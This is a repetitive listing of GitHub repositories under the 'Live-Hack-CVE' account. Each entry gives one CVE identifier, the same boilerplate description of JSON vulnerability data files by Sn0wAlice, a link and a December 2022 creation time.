**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35733 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35733](https://github.com/Live-Hack-CVE/CVE-2022-35733) create time: 2022-12-26T06:55:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34775](https://github.com/Live-Hack-CVE/CVE-2022-34775) create time: 2022-12-26T06:55:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34776 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34776](https://github.com/Live-Hack-CVE/CVE-2022-34776) create time: 2022-12-26T06:55:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28712 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28712](https://github.com/Live-Hack-CVE/CVE-2022-28712) create time: 2022-12-26T06:55:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30534 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30534](https://github.com/Live-Hack-CVE/CVE-2022-30534) create time: 2022-12-26T06:55:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37815](https://github.com/Live-Hack-CVE/CVE-2022-37815) create time: 2022-12-26T06:55:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37814](https://github.com/Live-Hack-CVE/CVE-2022-37814) create time: 2022-12-26T06:55:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37813 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37813](https://github.com/Live-Hack-CVE/CVE-2022-37813) create time: 2022-12-26T06:55:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37812 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37812](https://github.com/Live-Hack-CVE/CVE-2022-37812) create time: 2022-12-26T06:54:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37811 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37811](https://github.com/Live-Hack-CVE/CVE-2022-37811) create time: 2022-12-26T06:54:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37810](https://github.com/Live-Hack-CVE/CVE-2022-37810) create time: 2022-12-26T06:54:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37809](https://github.com/Live-Hack-CVE/CVE-2022-37809) create time: 2022-12-26T06:54:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37808 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37808](https://github.com/Live-Hack-CVE/CVE-2022-37808) create time: 2022-12-26T06:54:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37807](https://github.com/Live-Hack-CVE/CVE-2022-37807) create time: 2022-12-26T06:54:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37806 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37806](https://github.com/Live-Hack-CVE/CVE-2022-37806) create time: 2022-12-26T06:54:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37805](https://github.com/Live-Hack-CVE/CVE-2022-37805) create time: 2022-12-26T06:54:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37804](https://github.com/Live-Hack-CVE/CVE-2022-37804) create time: 2022-12-26T06:54:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37803](https://github.com/Live-Hack-CVE/CVE-2022-37803) create time: 2022-12-26T06:54:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37802](https://github.com/Live-Hack-CVE/CVE-2022-37802) create time: 2022-12-26T06:54:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37801 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37801](https://github.com/Live-Hack-CVE/CVE-2022-37801) create time: 2022-12-26T06:54:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37800 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37800](https://github.com/Live-Hack-CVE/CVE-2022-37800) create time: 2022-12-26T06:54:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37799 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37799](https://github.com/Live-Hack-CVE/CVE-2022-37799) create time: 2022-12-26T06:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37798](https://github.com/Live-Hack-CVE/CVE-2022-37798) create time: 2022-12-26T06:54:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34772 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34772](https://github.com/Live-Hack-CVE/CVE-2022-34772) create time: 2022-12-26T06:53:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30605](https://github.com/Live-Hack-CVE/CVE-2022-30605) create time: 2022-12-26T06:53:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34774](https://github.com/Live-Hack-CVE/CVE-2022-34774) create time: 2022-12-26T06:53:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34773](https://github.com/Live-Hack-CVE/CVE-2022-34773) create time: 2022-12-26T06:53:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-3007 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-3007](https://github.com/Live-Hack-CVE/CVE-2007-3007) create time: 2022-12-26T05:32:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2007-2444 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2007-2444](https://github.com/Live-Hack-CVE/CVE-2007-2444) create time: 2022-12-26T05:31:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-6566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-6566](https://github.com/Live-Hack-CVE/CVE-2008-6566) create time: 2022-12-26T06:03:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-1105 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-1105](https://github.com/Live-Hack-CVE/CVE-2008-1105) create time: 2022-12-26T05:31:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2008-3804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2008-3804](https://github.com/Live-Hack-CVE/CVE-2008-3804) create time: 2022-12-26T05:24:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2009-1888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2009-1888](https://github.com/Live-Hack-CVE/CVE-2009-1888) create time: 2022-12-26T06:03:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-2063 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-2063](https://github.com/Live-Hack-CVE/CVE-2010-2063) create time: 2022-12-26T05:31:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-3069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-3069](https://github.com/Live-Hack-CVE/CVE-2010-3069) create time: 2022-12-26T05:31:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-0215 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-0215](https://github.com/Live-Hack-CVE/CVE-2010-0215) create time: 2022-12-26T05:31:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2010-5298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2010-5298](https://github.com/Live-Hack-CVE/CVE-2010-5298) create time: 2022-12-26T05:26:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-4566 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-4566](https://github.com/Live-Hack-CVE/CVE-2011-4566) create time: 2022-12-26T05:31:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2011-2522 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2011-2522](https://github.com/Live-Hack-CVE/CVE-2011-2522) create time: 2022-12-26T05:31:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20122](https://github.com/Live-Hack-CVE/CVE-2022-20122) create time: 2022-12-26T06:09:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1756](https://github.com/Live-Hack-CVE/CVE-2012-1756) create time: 2022-12-26T05:27:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1734 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1734](https://github.com/Live-Hack-CVE/CVE-2012-1734) create time: 2022-12-26T05:27:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-1757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-1757](https://github.com/Live-Hack-CVE/CVE-2012-1757) create time: 2022-12-26T05:27:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3166](https://github.com/Live-Hack-CVE/CVE-2012-3166) create time: 2022-12-26T05:26:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3173 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3173](https://github.com/Live-Hack-CVE/CVE-2012-3173) create time: 2022-12-26T05:26:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3180 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3180](https://github.com/Live-Hack-CVE/CVE-2012-3180) create time: 2022-12-26T05:26:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-3150 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-3150](https://github.com/Live-Hack-CVE/CVE-2012-3150) create time: 2022-12-26T05:26:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-5614 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-5614](https://github.com/Live-Hack-CVE/CVE-2012-5614) create time: 2022-12-26T05:25:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2012-5627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2012-5627](https://github.com/Live-Hack-CVE/CVE-2012-5627) create time: 2022-12-26T05:25:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-4496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-4496](https://github.com/Live-Hack-CVE/CVE-2013-4496) create time: 2022-12-26T05:33:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0383](https://github.com/Live-Hack-CVE/CVE-2013-0383) create time: 2022-12-26T05:28:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3783 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3783](https://github.com/Live-Hack-CVE/CVE-2013-3783) create time: 2022-12-26T05:27:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2389 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2389](https://github.com/Live-Hack-CVE/CVE-2013-2389) create time: 2022-12-26T05:26:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3793 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3793](https://github.com/Live-Hack-CVE/CVE-2013-3793) create time: 2022-12-26T05:26:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-2392 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-2392](https://github.com/Live-Hack-CVE/CVE-2013-2392) create time: 2022-12-26T05:26:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3794](https://github.com/Live-Hack-CVE/CVE-2013-3794) create time: 2022-12-26T05:26:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-3802 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-3802](https://github.com/Live-Hack-CVE/CVE-2013-3802) create time: 2022-12-26T05:26:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0239](https://github.com/Live-Hack-CVE/CVE-2014-0239) create time: 2022-12-26T05:33:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4049 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4049](https://github.com/Live-Hack-CVE/CVE-2014-4049) create time: 2022-12-26T05:32:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0221 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0221](https://github.com/Live-Hack-CVE/CVE-2014-0221) create time: 2022-12-26T05:28:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6495 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6495](https://github.com/Live-Hack-CVE/CVE-2014-6495) create time: 2022-12-26T05:28:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0198 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0198](https://github.com/Live-Hack-CVE/CVE-2014-0198) create time: 2022-12-26T05:28:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6507 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6507](https://github.com/Live-Hack-CVE/CVE-2014-6507) create time: 2022-12-26T05:28:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6494 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6494](https://github.com/Live-Hack-CVE/CVE-2014-6494) create time: 2022-12-26T05:28:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6496 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6496](https://github.com/Live-Hack-CVE/CVE-2014-6496) create time: 2022-12-26T05:28:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6478 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6478](https://github.com/Live-Hack-CVE/CVE-2014-6478) create time: 2022-12-26T05:28:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6559](https://github.com/Live-Hack-CVE/CVE-2014-6559) create time: 2022-12-26T05:27:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-4274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-4274](https://github.com/Live-Hack-CVE/CVE-2014-4274) create time: 2022-12-26T05:27:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0384 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0384](https://github.com/Live-Hack-CVE/CVE-2014-0384) create time: 2022-12-26T05:26:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0386](https://github.com/Live-Hack-CVE/CVE-2014-0386) create time: 2022-12-26T05:26:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-2419 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-2419](https://github.com/Live-Hack-CVE/CVE-2014-2419) create time: 2022-12-26T05:26:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0402 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0402](https://github.com/Live-Hack-CVE/CVE-2014-0402) create time: 2022-12-26T05:25:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-0412 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-0412](https://github.com/Live-Hack-CVE/CVE-2014-0412) create time: 2022-12-26T05:25:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-7560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-7560](https://github.com/Live-Hack-CVE/CVE-2015-7560) create time: 2022-12-26T06:03:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5299 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5299](https://github.com/Live-Hack-CVE/CVE-2015-5299) create time: 2022-12-26T05:32:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-3152 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-3152](https://github.com/Live-Hack-CVE/CVE-2015-3152) create time: 2022-12-26T05:32:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5296 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5296](https://github.com/Live-Hack-CVE/CVE-2015-5296) create time: 2022-12-26T05:32:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8467 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8467](https://github.com/Live-Hack-CVE/CVE-2015-8467) create time: 2022-12-26T05:31:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-5252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-5252](https://github.com/Live-Hack-CVE/CVE-2015-5252) create time: 2022-12-26T05:30:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-8879 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-8879](https://github.com/Live-Hack-CVE/CVE-2015-8879) create time: 2022-12-26T05:29:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-7540 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-7540](https://github.com/Live-Hack-CVE/CVE-2015-7540) create time: 2022-12-26T05:29:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-2620 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-2620](https://github.com/Live-Hack-CVE/CVE-2015-2620) create time: 2022-12-26T05:27:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-7744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-7744](https://github.com/Live-Hack-CVE/CVE-2015-7744) create time: 2022-12-26T05:27:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0432 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0432](https://github.com/Live-Hack-CVE/CVE-2015-0432) create time: 2022-12-26T05:25:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0381 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0381](https://github.com/Live-Hack-CVE/CVE-2015-0381) create time: 2022-12-26T05:23:11Z

